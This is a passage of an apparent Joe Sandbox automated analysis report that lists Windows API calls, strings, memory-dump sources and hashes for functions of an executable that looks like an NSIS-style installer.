                                                        • Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68
                                                        APIs
                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
                                                        • ShowWindow.USER32(?), ref: 004054D2
                                                        • DestroyWindow.USER32 ref: 004054E6
                                                        • SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
                                                        • GetDlgItem.USER32(?,?), ref: 00405523
                                                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
                                                        • IsWindowEnabled.USER32(00000000), ref: 0040553E
                                                        • GetDlgItem.USER32(?,00000001), ref: 004055ED
                                                        • GetDlgItem.USER32(?,00000002), ref: 004055F7
                                                        • SetClassLongW.USER32(?,000000F2,?), ref: 00405611
                                                        • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
                                                        • GetDlgItem.USER32(?,00000003), ref: 00405708
                                                        • ShowWindow.USER32(00000000,?), ref: 0040572A
                                                        • EnableWindow.USER32(?,?), ref: 0040573C
                                                        • EnableWindow.USER32(?,?), ref: 00405757
                                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
                                                        • EnableMenuItem.USER32(00000000), ref: 00405774
                                                        • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
                                                        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
                                                        • lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
                                                        • SetWindowTextW.USER32(?,00447240), ref: 004057DC
                                                        • ShowWindow.USER32(?,0000000A), ref: 00405910
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                        • String ID: @rD
                                                        • API String ID: 184305955-3814967855
                                                        • Opcode ID: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                        • Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
                                                        • Opcode Fuzzy Hash: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                        • Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E
                                                        APIs
                                                        • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
                                                        • GetDlgItem.USER32(?,000003E8), ref: 00404181
                                                        • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
                                                        • GetSysColor.USER32(?), ref: 004041AF
                                                        • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
                                                        • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
                                                        • lstrlenW.KERNEL32(?), ref: 004041D6
                                                        • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
                                                        • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2
                                                          • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
                                                          • Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
                                                          • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004
                                                        • GetDlgItem.USER32(?,0000040A), ref: 0040424A
                                                        • SendMessageW.USER32(00000000), ref: 00404251
                                                        • GetDlgItem.USER32(?,000003E8), ref: 0040427E
                                                        • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
                                                        • SetCursor.USER32(00000000), ref: 004042D2
                                                        • ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
                                                        • SetCursor.USER32(00000000), ref: 004042F6
                                                        • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                        • String ID: @%F$N$open
                                                        • API String ID: 3928313111-3849437375
                                                        • Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                        • Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
                                                        • Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                        • Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99
                                                        APIs
                                                        • lstrcpyW.KERNEL32(0045B2C8,NUL), ref: 00406AA9
                                                        • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
                                                        • GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1
                                                          • Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                          • Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                        • GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
                                                        • wsprintfA.USER32 ref: 00406B4D
                                                        • GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
                                                        • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
                                                        • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37
                                                          • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                          • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                        • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
                                                        • GlobalFree.KERNEL32(00000000), ref: 00406C52
                                                        • CloseHandle.KERNEL32(?), ref: 00406C5C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                        • String ID: F$%s=%s$NUL$[Rename]
                                                        • API String ID: 565278875-1653569448
                                                        • Opcode ID: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                                        • Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
                                                        • Opcode Fuzzy Hash: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                                        • Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC
                                                        APIs
                                                        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                        • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                        • DeleteObject.GDI32(?), ref: 004010F6
                                                        • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                        • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                        • SelectObject.GDI32(00000000,?), ref: 00401149
                                                        • DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                        • DeleteObject.GDI32(?), ref: 0040116E
                                                        • EndPaint.USER32(?,?), ref: 00401177
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                        • String ID: F
                                                        • API String ID: 941294808-1304234792
                                                        • Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                        • Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
                                                        • Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                        • Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4
                                                        APIs
                                                        • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                        • lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                        • RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                        • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                        Strings
                                                        • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                        • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                        • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                        • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                        • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                        • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$CloseCreateValuewvsprintf
                                                        • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                        • API String ID: 1641139501-220328614
                                                        • Opcode ID: d79db666ee92a39b53e47641609ed565b43369f8775619f718224e07aa5483b4
                                                        • Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
                                                        • Opcode Fuzzy Hash: d79db666ee92a39b53e47641609ed565b43369f8775619f718224e07aa5483b4
                                                        • Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59
                                                        APIs
                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                        • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                        • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                        • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                        • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                        • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                        Strings
                                                        • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                        • String ID: created uninstaller: %d, "%s"
                                                        • API String ID: 3294113728-3145124454
                                                        • Opcode ID: c666975226392a23a96cc8c7abb3eb5c8f7508c76e04a15e1ccd320165ca38cb
                                                        • Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
                                                        • Opcode Fuzzy Hash: c666975226392a23a96cc8c7abb3eb5c8f7508c76e04a15e1ccd320165ca38cb
                                                        • Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98
                                                        APIs
                                                        • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                        • GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
                                                        • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
                                                        • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678), ref: 0040619B
                                                        • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
                                                        • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                        • String ID: RMDir: RemoveDirectory invalid input("")
                                                        • API String ID: 3734993849-2769509956
                                                        • Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                        • Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
                                                        • Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                        • Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD
                                                        APIs
                                                        • GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
                                                        • GetSysColor.USER32(00000000), ref: 00403E00
                                                        • SetTextColor.GDI32(?,00000000), ref: 00403E0C
                                                        • SetBkMode.GDI32(?,?), ref: 00403E18
                                                        • GetSysColor.USER32(?), ref: 00403E2B
                                                        • SetBkColor.GDI32(?,?), ref: 00403E3B
                                                        • DeleteObject.GDI32(?), ref: 00403E55
                                                        • CreateBrushIndirect.GDI32(?), ref: 00403E5F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                        • String ID:
                                                        • API String ID: 2320649405-0
                                                        • Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                        • Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
                                                        • Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                        • Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                          • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                                                          • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                        • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                        • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                        Strings
                                                        • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                        • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                        • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                        • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
                                                        • API String ID: 1033533793-945480824
                                                        • Opcode ID: aebbfb54fe117075fb91935afd2b3d42be9cb3525beaf419298f1839c78bdf39
                                                        • Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
                                                        • Opcode Fuzzy Hash: aebbfb54fe117075fb91935afd2b3d42be9cb3525beaf419298f1839c78bdf39
